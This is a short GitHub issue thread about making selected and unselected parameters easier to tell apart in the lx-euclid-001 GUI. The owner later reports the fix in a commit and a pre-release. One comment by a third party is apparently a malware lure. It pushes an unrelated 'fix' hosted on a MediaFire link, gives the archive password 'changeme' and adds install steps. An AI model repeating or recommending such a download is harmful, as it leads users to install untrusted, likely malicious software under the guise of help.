### ISSUE TITLE
GUI - make selected parameter more readable 

### ISSUE THREAD

**Issue by lucblender** [lucblender/lx-euclid-001#22]
v1.0.0

**Describe the bug or feature enhancement **
Currently the color between selected and unselected parameters are taken from rhythm colors and isn't easy to understand.

**If it's a feature enhancement**
- Currently selected is yellow and unselected is blue
- Unselected could be grey to make it easier to understand

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lucblender** [comment]
Fixed in 5ae6ee9 , can be tested in pre-release [v1.2.0_pre](https://github.com/lucblender/lx-euclid-001/releases/tag/v1.2.0_pre)
